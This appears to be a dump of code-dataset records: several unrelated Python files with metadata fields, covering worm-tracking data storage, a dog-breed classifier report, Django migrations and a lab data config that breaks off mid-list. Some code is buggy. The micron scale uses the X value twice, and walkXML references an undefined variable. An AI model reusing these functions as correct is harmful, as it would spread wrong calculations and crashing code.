""" # -*- coding: utf-8 -*- Created on Thu Dec 17 10:10:35 2015 @author: ajaver """ import os import stat import xml.etree.ElementTree as ET import tables import numpy as np import csv from collections import OrderedDict #%% Read/Store the XML file with the pixel size and fps info def storeXMLInfo(info_file, masked_image_file): with open(info_file, 'r') as fid: xml_info = fid.read() # if it is empty the xml create a node and exit if not xml_info: with tables.File(masked_image_file, 'r+') as fid: fid.create_array('/', 'xml_info', obj=bytes('', 'utf-8')) return # read the xml and exit root = ET.fromstring(xml_info) x_microns = float(root.findall( './info/stage/steps/equivalent/microns/x')[0].text) y_microns = float(root.findall( './info/stage/steps/equivalent/microns/y')[0].text) x_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/x')[0].text) y_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/y')[0].text) fps = float(root.findall('./info/camera/display/frame/rate')[0].text) pixels2microns_x = x_microns / x_pixels pixels2microns_y = y_microns / y_pixels with tables.File(masked_image_file, 'r+') as fid: if '/xml_info' in fid: fid.remove_node('/', 'xml_info') xml_node = fid.create_array( '/', 'xml_info', obj=bytes( xml_info, 'utf-8')) masks_node = fid.get_node('/', 'mask') masks_node.attrs['fps'] = fps masks_node.attrs['pixels2microns_x'] = pixels2microns_x masks_node.attrs['pixels2microns_y'] = pixels2microns_y # Read the scale conversions, we would need this when we want to convert the pixels into microns pixelPerMicronX = 1/pixels2microns_x pixelPerMicronY = 1/pixels2microns_y normScale = np.sqrt((pixelPerMicronX ** 2 + pixelPerMicronX ** 2) / 2); pixelPerMicronScale = normScale * np.array((np.sign(pixelPerMicronX), np.sign(pixelPerMicronY))); assert np.abs(pixelPerMicronScale[0]) == np.abs(pixelPerMicronScale[1]) masks_node.attrs['microns_per_pixel'] = np.abs(pixelPerMicronScale[0]) masks_node.attrs['xy_units'] = 'micrometers' #%% Read/Store the CSV file with the stage positions def storeStageData(stage_file, masked_image_file): # read motor data from csv with open(stage_file) as fid: reader = csv.reader(fid) data = [line for line in reader] # if the csv lines must be larger than one (a header), othewise it is an # empty file if len(data) <= 1: with tables.File(masked_image_file, 'r+') as fid: dtype = [('real_time', int), ('stage_time', int), ('stage_x', float), ('stage_y', float)] fid.create_table('/', 'stage_log', obj=np.recarray(0, dtype)) return #import pdb # pdb.set_trace() # filter, check and store the data into a recarray header, data = _getHeader(data) csv_dict = _data2dict(header, data) stage_recarray = _dict2recarray(csv_dict) with tables.File(masked_image_file, 'r+') as mask_fid: if '/stage_log' in mask_fid: mask_fid.remove_node('/', 'stage_log') mask_fid.create_table('/', 'stage_log', obj=stage_recarray) return csv_dict def _timestr2sec(timestr): time_parts = [float(x) for x in timestr.split(':')] return sum((60**ii) * part for ii, part in enumerate(time_parts[::-1])) def _getHeader(data): assert data # find header (it is not always the first line) for ii, line in enumerate(data): if line[0] == 'Real Time': break assert(ii < len(line) - 1) header = data.pop(ii) # check that the expected columns are in header expected_header = [ 'Real Time', 'Media Time', 'Location Type', 'Centroid/Stage/Speed X (microns[/second])', 'Centroid/Stage/Speed Y (microns[/second])', 'MER Min X (microns)', 'MER Min Y (microns)', 'MER Width (microns)', 'MER Height (microns)'] assert all(col in expected_header for col in header) return header, data def _data2dict(header, data): # read the csv data into a dictionary where each field is the data from a # column assert data # filter any possible croped data data = [x for x in data if len(x) == len(header)] # save data into a dictionary csv_dict = {} for ii, col_data in enumerate(zip(*data)): csv_dict[header[ii]] = col_data # Check the data is correct # This is not really a necessary assertion this STAGE flag does not seem useuful. #assert all(x == 'STAGE' for x in csv_dict['Location Type']) del csv_dict['Location Type'] # delete this columns # for col_name in ['MER Min X (microns)', 'MER Min Y (microns)', \ #'MER Width (microns)', 'MER Height (microns)']: # if col_name in csv_dict #assert all(not x for x in csv_dict[col_name]) #del csv_dict[col_name] return csv_dict def _dict2recarray(csv_dict): # convert the csv data into a recarray compatible with pytables dat = OrderedDict() dat['real_time'] = np.array([bytes(x, 'utf-8') for x in csv_dict['Real Time']]) dat['stage_time'] = np.array([_timestr2sec(x) for x in csv_dict['Media Time']]) dat['stage_x'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed X (microns[/second])']]) dat['stage_y'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed Y (microns[/second])']]) # convert into recarray (pytables friendly) dtype = [(kk, dat[kk].dtype) for kk in dat] N = len(dat['stage_x']) stage_recarray = np.recarray(N, dtype) for kk in dat: stage_recarray[kk] = dat[kk] return stage_recarray def getAdditionalFiles(video_file): if not (os.path.exists(video_file)): raise FileNotFoundError(video_file) base_name = os.path.splitext(video_file)[0] info_file = base_name + '.info.xml' stage_file = base_name + '.log.csv' info_file = _getValidFile(info_file) stage_file = _getValidFile(stage_file) return info_file, stage_file def hasAdditionalFiles(video_file): try: getAdditionalFiles(video_file) return True except FileNotFoundError: return False def _insertDirectory(original_file, dir2add): dd = os.path.split(original_file) return os.path.join(dd[0], dir2add, dd[1]) def _getValidFile(file_name): if not os.path.exists(file_name): file_name = _insertDirectory(file_name, '.data') if not os.path.exists(file_name): raise FileNotFoundError( 'Additional %s file do not exists.' % file_name) # if (os.stat(file_name).st_size == 0): # raise IOError('%s is empty' % file_name) return file_name #%% main function to store the additional data def storeAdditionalDataSW(video_file, masked_image_file): assert(os.path.exists(video_file)) assert(os.path.exists(masked_image_file)) info_file, stage_file = getAdditionalFiles(video_file) assert(os.path.exists(video_file)) assert(os.path.exists(stage_file)) # store data storeXMLInfo(info_file, masked_image_file) storeStageData(stage_file, masked_image_file) with tables.File(masked_image_file, 'r+') as mask_fid: mask_fid.get_node('/mask').attrs['has_finished'] = 2 # DEPRECATED def walkXML(curr_node, params=[], curr_path=''): ''' Return the structure of a ElementTree into a directory list. I am not really using this function but it is cool. ''' curr_path += '/' + curr_node.tag if len(curr_node) == 0: param.append((curr_path, curr_node.text)) return params for node in curr_node: walkXML(node, params, curr_path)
en
0.792479
# -*- coding: utf-8 -*- Created on Thu Dec 17 10:10:35 2015 @author: ajaver #%% Read/Store the XML file with the pixel size and fps info # if it is empty the xml create a node and exit # read the xml and exit # Read the scale conversions, we would need this when we want to convert the pixels into microns #%% Read/Store the CSV file with the stage positions # read motor data from csv # if the csv lines must be larger than one (a header), othewise it is an # empty file #import pdb # pdb.set_trace() # filter, check and store the data into a recarray # find header (it is not always the first line) # check that the expected columns are in header # read the csv data into a dictionary where each field is the data from a # column # filter any possible croped data # save data into a dictionary # Check the data is correct # This is not really a necessary assertion this STAGE flag does not seem useuful. #assert all(x == 'STAGE' for x in csv_dict['Location Type']) # delete this columns # for col_name in ['MER Min X (microns)', 'MER Min Y (microns)', \ #'MER Width (microns)', 'MER Height (microns)']: # if col_name in csv_dict #assert all(not x for x in csv_dict[col_name]) #del csv_dict[col_name] # convert the csv data into a recarray compatible with pytables # convert into recarray (pytables friendly) # if (os.stat(file_name).st_size == 0): # raise IOError('%s is empty' % file_name) #%% main function to store the additional data # store data # DEPRECATED Return the structure of a ElementTree into a directory list. I am not really using this function but it is cool.
2.262056
2
commitroll/commitable.py
claybrooks/commitroll
0
6623578
<reponame>claybrooks/commitroll<gh_stars>0 from functools import wraps COMMIT="1__commit" NO_COMMIT="2__no_commit" COMMIT_ALL="3__commit_all" SAVE_STATE="4__save_state" def Commit(func): setattr(func, COMMIT, True) return func def NoCommit(obj): setattr(obj, NO_COMMIT, True) return obj def CommitAll(obj): setattr(obj, COMMIT_ALL, True) return obj def SaveState(_lambda): def wrapper(f): @wraps(f) def wrapped(inst, *args, **kwargs): f(inst, *args, **kwargs) setattr(inst, SAVE_STATE, list(_lambda(inst))) return wrapped return wrapper
from functools import wraps COMMIT="1__commit" NO_COMMIT="2__no_commit" COMMIT_ALL="3__commit_all" SAVE_STATE="4__save_state" def Commit(func): setattr(func, COMMIT, True) return func def NoCommit(obj): setattr(obj, NO_COMMIT, True) return obj def CommitAll(obj): setattr(obj, COMMIT_ALL, True) return obj def SaveState(_lambda): def wrapper(f): @wraps(f) def wrapped(inst, *args, **kwargs): f(inst, *args, **kwargs) setattr(inst, SAVE_STATE, list(_lambda(inst))) return wrapped return wrapper
none
1
2.574703
3
intropyproject-classify-pet-images/print_results.py
petercm/AIPND-revision
0
6623579
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # */AIPND-revision/intropyproject-classify-pet-images/print_results.py # # PROGRAMMER: petercm # DATE CREATED: 01/03/2019 # REVISED DATE: # PURPOSE: Create a function print_results that prints the results statistics # from the results statistics dictionary (results_stats_dic). It # should also allow the user to be able to print out cases of misclassified # dogs and cases of misclassified breeds of dog using the Results # dictionary (results_dic). # This function inputs: # -The results dictionary as results_dic within print_results # function and results for the function call within main. # -The results statistics dictionary as results_stats_dic within # print_results function and results_stats for the function call within main. # -The CNN model architecture as model wihtin print_results function # and in_arg.arch for the function call within main. # -Prints Incorrectly Classified Dogs as print_incorrect_dogs within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # -Prints Incorrectly Classified Breeds as print_incorrect_breed within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # This function does not output anything other than printing a summary # of the final results. ## # TODO 6: Define print_results function below, specifically replace the None # below by the function definition of the print_results function. # Notice that this function doesn't to return anything because it # prints a summary of the results using results_dic and results_stats_dic # stat_labels = { 'n_images': 'Number of Images', 'n_dogs_img': 'Number of Dog Images', 'n_notdogs_img': 'Number of "Not-a" Dog Images', 'n_match': 'Number of Correct Matches', 'n_correct_dogs': 'Number of Correct Dog Matches', 'n_correct_notdogs': 'Number of Correct "Not-a" Dog Matches', 'n_correct_breed': 'Number of Correct Breed Matches', 'pct_match': '% Match', 'pct_correct_dogs': '% Correct Dogs', 'pct_correct_breed': '% Correct Breed', 'pct_correct_notdogs': '% Correct "Not-a" Dog' } def print_stat(label, stat=''): print("| {:43} {:>17} |".format(label, stat)) def print_misclassified(results_dic, filter): for key in results_dic: result = results_dic[key] if filter(result): print("|") print("| {:30} {}".format(key, result[0])) print("| {:30} {}".format('', result[1])) def print_results(results_dic, results_stats_dic, model, print_incorrect_dogs = False, print_incorrect_breed = False): """ Prints summary results on the classification and then prints incorrectly classified dogs and incorrectly classified dog breeds if user indicates they want those printouts (use non-default values) Parameters: results_dic - Dictionary with key as image filename and value as a List (index)idx 0 = pet image label (string) idx 1 = classifier label (string) idx 2 = 1/0 (int) where 1 = match between pet image and classifer labels and 0 = no match between labels idx 3 = 1/0 (int) where 1 = pet image 'is-a' dog and 0 = pet Image 'is-NOT-a' dog. idx 4 = 1/0 (int) where 1 = Classifier classifies image 'as-a' dog and 0 = Classifier classifies image 'as-NOT-a' dog. results_stats_dic - Dictionary that contains the results statistics (either a percentage or a count) where the key is the statistic's name (starting with 'pct' for percentage or 'n' for count) and the value is the statistic's value model - Indicates which CNN model architecture will be used by the classifier function to classify the pet images, values must be either: resnet alexnet vgg (string) print_incorrect_dogs - True prints incorrectly classified dog images and False doesn't print anything(default) (bool) print_incorrect_breed - True prints incorrectly classified dog breeds and False doesn't print anything(default) (bool) Returns: None - simply printing results. """ print("\n") print("-----------------------------------------------------------------") print_stat('Dog breed classification results for model:', model) print("|---------------------------------------------------------------|") for stat_key in ['n_images', 'n_dogs_img', 'n_notdogs_img']: print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") for stat_key in stat_labels: if stat_key.startswith('pct_'): print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") n_correct_dogs = results_stats_dic['n_correct_dogs'] n_correct_notdogs = results_stats_dic['n_correct_notdogs'] n_correct_breed = results_stats_dic['n_correct_breed'] if print_incorrect_dogs: n_dog_misses = results_stats_dic['n_images'] - n_correct_dogs - n_correct_notdogs if n_dog_misses > 0: print_stat('Some dogs were misclassified:', n_dog_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 1) else: print_stat('No dogs were misclassified') print("|---------------------------------------------------------------|") if print_incorrect_breed: n_breed_misses = n_correct_dogs - n_correct_breed if n_breed_misses > 0: print_stat('Some breeds were misclassified:', n_breed_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 2 and result[2] == 0) else: print_stat('No breeds were misclassified') print("|---------------------------------------------------------------|")
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # */AIPND-revision/intropyproject-classify-pet-images/print_results.py # # PROGRAMMER: petercm # DATE CREATED: 01/03/2019 # REVISED DATE: # PURPOSE: Create a function print_results that prints the results statistics # from the results statistics dictionary (results_stats_dic). It # should also allow the user to be able to print out cases of misclassified # dogs and cases of misclassified breeds of dog using the Results # dictionary (results_dic). # This function inputs: # -The results dictionary as results_dic within print_results # function and results for the function call within main. # -The results statistics dictionary as results_stats_dic within # print_results function and results_stats for the function call within main. # -The CNN model architecture as model wihtin print_results function # and in_arg.arch for the function call within main. # -Prints Incorrectly Classified Dogs as print_incorrect_dogs within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # -Prints Incorrectly Classified Breeds as print_incorrect_breed within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # This function does not output anything other than printing a summary # of the final results. ## # TODO 6: Define print_results function below, specifically replace the None # below by the function definition of the print_results function. # Notice that this function doesn't to return anything because it # prints a summary of the results using results_dic and results_stats_dic # stat_labels = { 'n_images': 'Number of Images', 'n_dogs_img': 'Number of Dog Images', 'n_notdogs_img': 'Number of "Not-a" Dog Images', 'n_match': 'Number of Correct Matches', 'n_correct_dogs': 'Number of Correct Dog Matches', 'n_correct_notdogs': 'Number of Correct "Not-a" Dog Matches', 'n_correct_breed': 'Number of Correct Breed Matches', 'pct_match': '% Match', 'pct_correct_dogs': '% Correct Dogs', 'pct_correct_breed': '% Correct Breed', 'pct_correct_notdogs': '% Correct "Not-a" Dog' } def print_stat(label, stat=''): print("| {:43} {:>17} |".format(label, stat)) def print_misclassified(results_dic, filter): for key in results_dic: result = results_dic[key] if filter(result): print("|") print("| {:30} {}".format(key, result[0])) print("| {:30} {}".format('', result[1])) def print_results(results_dic, results_stats_dic, model, print_incorrect_dogs = False, print_incorrect_breed = False): """ Prints summary results on the classification and then prints incorrectly classified dogs and incorrectly classified dog breeds if user indicates they want those printouts (use non-default values) Parameters: results_dic - Dictionary with key as image filename and value as a List (index)idx 0 = pet image label (string) idx 1 = classifier label (string) idx 2 = 1/0 (int) where 1 = match between pet image and classifer labels and 0 = no match between labels idx 3 = 1/0 (int) where 1 = pet image 'is-a' dog and 0 = pet Image 'is-NOT-a' dog. idx 4 = 1/0 (int) where 1 = Classifier classifies image 'as-a' dog and 0 = Classifier classifies image 'as-NOT-a' dog. results_stats_dic - Dictionary that contains the results statistics (either a percentage or a count) where the key is the statistic's name (starting with 'pct' for percentage or 'n' for count) and the value is the statistic's value model - Indicates which CNN model architecture will be used by the classifier function to classify the pet images, values must be either: resnet alexnet vgg (string) print_incorrect_dogs - True prints incorrectly classified dog images and False doesn't print anything(default) (bool) print_incorrect_breed - True prints incorrectly classified dog breeds and False doesn't print anything(default) (bool) Returns: None - simply printing results. """ print("\n") print("-----------------------------------------------------------------") print_stat('Dog breed classification results for model:', model) print("|---------------------------------------------------------------|") for stat_key in ['n_images', 'n_dogs_img', 'n_notdogs_img']: print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") for stat_key in stat_labels: if stat_key.startswith('pct_'): print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") n_correct_dogs = results_stats_dic['n_correct_dogs'] n_correct_notdogs = results_stats_dic['n_correct_notdogs'] n_correct_breed = results_stats_dic['n_correct_breed'] if print_incorrect_dogs: n_dog_misses = results_stats_dic['n_images'] - n_correct_dogs - n_correct_notdogs if n_dog_misses > 0: print_stat('Some dogs were misclassified:', n_dog_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 1) else: print_stat('No dogs were misclassified') print("|---------------------------------------------------------------|") if print_incorrect_breed: n_breed_misses = n_correct_dogs - n_correct_breed if n_breed_misses > 0: print_stat('Some breeds were misclassified:', n_breed_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 2 and result[2] == 0) else: print_stat('No breeds were misclassified') print("|---------------------------------------------------------------|")
en
0.7831
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # */AIPND-revision/intropyproject-classify-pet-images/print_results.py # # PROGRAMMER: petercm # DATE CREATED: 01/03/2019 # REVISED DATE: # PURPOSE: Create a function print_results that prints the results statistics # from the results statistics dictionary (results_stats_dic). It # should also allow the user to be able to print out cases of misclassified # dogs and cases of misclassified breeds of dog using the Results # dictionary (results_dic). # This function inputs: # -The results dictionary as results_dic within print_results # function and results for the function call within main. # -The results statistics dictionary as results_stats_dic within # print_results function and results_stats for the function call within main. # -The CNN model architecture as model wihtin print_results function # and in_arg.arch for the function call within main. # -Prints Incorrectly Classified Dogs as print_incorrect_dogs within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # -Prints Incorrectly Classified Breeds as print_incorrect_breed within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # This function does not output anything other than printing a summary # of the final results. ## # TODO 6: Define print_results function below, specifically replace the None # below by the function definition of the print_results function. # Notice that this function doesn't to return anything because it # prints a summary of the results using results_dic and results_stats_dic # Prints summary results on the classification and then prints incorrectly classified dogs and incorrectly classified dog breeds if user indicates they want those printouts (use non-default values) Parameters: results_dic - Dictionary with key as image filename and value as a List (index)idx 0 = pet image label (string) idx 1 = classifier label (string) idx 2 = 1/0 (int) where 1 = match between pet image and classifer labels and 0 = no match between labels idx 3 = 1/0 (int) where 1 = pet image 'is-a' dog and 0 = pet Image 'is-NOT-a' dog. idx 4 = 1/0 (int) where 1 = Classifier classifies image 'as-a' dog and 0 = Classifier classifies image 'as-NOT-a' dog. results_stats_dic - Dictionary that contains the results statistics (either a percentage or a count) where the key is the statistic's name (starting with 'pct' for percentage or 'n' for count) and the value is the statistic's value model - Indicates which CNN model architecture will be used by the classifier function to classify the pet images, values must be either: resnet alexnet vgg (string) print_incorrect_dogs - True prints incorrectly classified dog images and False doesn't print anything(default) (bool) print_incorrect_breed - True prints incorrectly classified dog breeds and False doesn't print anything(default) (bool) Returns: None - simply printing results.
3.124228
3
kitsune/karma/migrations/0001_initial.py
navgurukul-shivani18/kitsune
929
6623580
<filename>kitsune/karma/migrations/0001_initial.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ ('auth', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Title', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(unique=True, max_length=100)), ('is_auto', models.BooleanField(default=False)), ('groups', models.ManyToManyField(help_text=b'Assign this title to these groups.', to='auth.Group', blank=True)), ('users', models.ManyToManyField(help_text=b'Assign this title to these users.', to=settings.AUTH_USER_MODEL, blank=True)), ], options={ 'abstract': False, }, bases=(models.Model,), ), ]
<filename>kitsune/karma/migrations/0001_initial.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ ('auth', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Title', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(unique=True, max_length=100)), ('is_auto', models.BooleanField(default=False)), ('groups', models.ManyToManyField(help_text=b'Assign this title to these groups.', to='auth.Group', blank=True)), ('users', models.ManyToManyField(help_text=b'Assign this title to these users.', to=settings.AUTH_USER_MODEL, blank=True)), ], options={ 'abstract': False, }, bases=(models.Model,), ), ]
en
0.769321
# -*- coding: utf-8 -*-
1.747541
2
contacts/migrations/0012_auto_20190418_0543.py
martbln/django-service-boilerplate
18
6623581
<filename>contacts/migrations/0012_auto_20190418_0543.py # Generated by Django 2.1.7 on 2019-04-18 05:43 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import pik.core.models.uided import simple_history.models import core.fields class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('contacts', '0011_auto_20190403_0607'), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created')), ('updated', models.DateTimeField(auto_now=True, db_index=True, verbose_name='updated')), ('uid', models.UUIDField(default=pik.core.models.uided._new_uid, editable=False, primary_key=True, serialize=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='HistoricalCategory', fields=[ ('created', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='created')), ('updated', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='updated')), ('uid', models.UUIDField(db_index=True, default=pik.core.models.uided._new_uid, editable=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('history_id', models.AutoField(primary_key=True, serialize=False)), ('history_date', models.DateTimeField()), ('history_change_reason', models.CharField(max_length=100, null=True)), ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)), ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)), ('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category')), ], options={ 'verbose_name': 'historical category', 'ordering': ('-history_date', '-history_id'), 'get_latest_by': 'history_date', }, bases=(simple_history.models.HistoricalChanges, models.Model), ), migrations.AddField( model_name='contact', name='category', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category'), ), migrations.AddField( model_name='historicalcontact', name='category', field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category'), ), ]
<filename>contacts/migrations/0012_auto_20190418_0543.py # Generated by Django 2.1.7 on 2019-04-18 05:43 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import pik.core.models.uided import simple_history.models import core.fields class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('contacts', '0011_auto_20190403_0607'), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created')), ('updated', models.DateTimeField(auto_now=True, db_index=True, verbose_name='updated')), ('uid', models.UUIDField(default=pik.core.models.uided._new_uid, editable=False, primary_key=True, serialize=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='HistoricalCategory', fields=[ ('created', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='created')), ('updated', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='updated')), ('uid', models.UUIDField(db_index=True, default=pik.core.models.uided._new_uid, editable=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('history_id', models.AutoField(primary_key=True, serialize=False)), ('history_date', models.DateTimeField()), ('history_change_reason', models.CharField(max_length=100, null=True)), ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)), ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)), ('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category')), ], options={ 'verbose_name': 'historical category', 'ordering': ('-history_date', '-history_id'), 'get_latest_by': 'history_date', }, bases=(simple_history.models.HistoricalChanges, models.Model), ), migrations.AddField( model_name='contact', name='category', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category'), ), migrations.AddField( model_name='historicalcontact', name='category', field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category'), ), ]
en
0.620975
# Generated by Django 2.1.7 on 2019-04-18 05:43
1.593965
2
castanea/utils/with_none.py
YusukeSuzuki/castanea
0
6623582
<gh_stars>0 import tensorflow as tf class WithNone: def __enter__(self): pass def __exit__(self,t,v,tb): pass def device_or_none(x): return WithNone() if x is None else tf.device(x)
import tensorflow as tf class WithNone: def __enter__(self): pass def __exit__(self,t,v,tb): pass def device_or_none(x): return WithNone() if x is None else tf.device(x)
none
1
2.574156
3
sample-viewer-api/src/static/data/compile_cvisb_data/config.py
cvisb/cvisb_data
2
6623583
# Config file to specify the inputs / outputs of CViSB data compilation from datetime import datetime today = datetime.today().strftime('%Y-%m-%d') DATADIR = "/Users/laurahughes/GitHub/cvisb_data/sample-viewer-api/src/static/data/" # [INPUTS] ---------------------------------------------------------------------------------------------- # --- id dictionary --- ID_DICT = f"{DATADIR}/output_data/patients/patients_2019-09-13_PRIVATE_dict.json" # --- patients --- # ACUTE_IDS_FILE = f"{DATADIR}/input_data/patient_rosters/additional_IDdict_v3_2019-10-23.csv" PATIENT_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/DisseminationData_31Aug20.xlsx" PATIENTS_UPDATEDBY = "<NAME>" PATIENTS_DATE = today PATIENTS_VERSION = 0.3 # --- hla --- HLA_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/Genotype_calls_2020-01-30.csv" HLA_DATE = "2020-11-23" HLA_VERSION = 0.3 HLA_UPDATEDBY = "<NAME>" # --- lassa virus seq --- ALIGNMENTS = [ {"virus": "Lassa", "segment": "S", "filename": "LASV_NP-GP_2020.11.23.fasta", "description": "Lassa virus NP-GP curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_NP_GPC_2020.11.23.fasta"}, {"virus": "Lassa", "segment": "L", "filename": "LASV_L_Z_2020.11.23.fasta", "description": "Lassa virus L-Z curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_L_Z_2020.11.23.fasta"}, {"virus": "Ebola", "segment": None, "filename": "EBOV_ORFs_2020.08.04.fasta", "curated": True, "description": "Ebola virus curated alignment", "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/ebola/EBOV_ORFs_2020.08.04.fasta"} ] # LVIRAL_AAFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_curated_aln_2019.09.11_duplicates_public.translated.fasta" LVIRAL_SFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_2020.11.23.fasta" LVIRAL_SFILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_non_curated_2020.11.23.fasta" LVIRAL_LFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_2020.11.23.fasta" LVIRAL_LFILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_non_curated_2020.11.23.fasta" LVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_lasv_curated_2020.11.23.csv" LVIRAL_DATE = "2020-11-23" LVIRAL_VERSION = 0.3 LVIRAL_UPDATEDBY = "<NAME>" # --- ebola virus seq --- EVIRAL_ALIGNEDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_curated_2020.08.04.fasta" EVIRAL_FILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_non_curated_2020.08.04.fasta" EVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_ebola_up_public_curated_2020.08.03.csv" EVIRAL_DATE = "2020-11-16" EVIRAL_VERSION = 0.3 EVIRAL_UPDATEDBY = "<NAME>" # --- serology --- SEROLOGY_FILE = f"{DATADIR}/input_data/expt_summary_data/systems_serology/CViSB_SystemsSerology_v0.2_2019Nov22_LH.xlsx" SEROLOGY_DATE = today SEROLOGY_VERSION = 0.2 SEROLOGY_UPDATEDBY = "<NAME>" # [OUPUTS] ---------------------------------------------------------------------------------------------- EXPORTDIR = f"{DATADIR}/output_data" LOGFILE = f"{DATADIR}/output_data/log/{today}_cvisb-compliation.log" EXPTCOLS = ['privatePatientID', 'experimentID', 'sampleID', 'visitCode', 'batchID', 'experimentDate', 'measurementTechnique', 'measurementCategory', 'variableMeasured', 'includedInDataset', 'isControl', 'publisher', 'citation', 'creator', 'data', 'correction', 'version', 'updatedBy', 'dateModified', 'releaseDate', 'sourceFiles', 'dataStatus'] # for non-KGH patients: what info should be PATIENTCOLS = [ "patientID", "species", "alternateIdentifier", "hasPatientData", "hasSurvivorData", "dateModified", "updatedBy", "dataStatus", 'sourceFiles', "version", "cohort", "outcome", "country", "countryName", "location", "locationPrivate", "infectionYear", 'publisher', 'citation','correction'] # For all experiments, to relate sample <--> experiment SAMPLECOLS = ["creatorInitials", "sampleLabel", "sampleType", "species", "sampleID", "samplingDate", 'sourceFiles'] # All data download properties, from experiments DOWNLOADCOLS = ["name", "includedInDataset", "identifier", "contentUrl", "additionalType", "variableMeasured", "measurementTechnique", "measurementCategory", "dateModified", "experimentIDs", "contentUrlRepository", "contentUrlIdentifier", "citation", "updatedBy", 'publisher', "creator"] # Properties to export in patient ID dictionary DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", 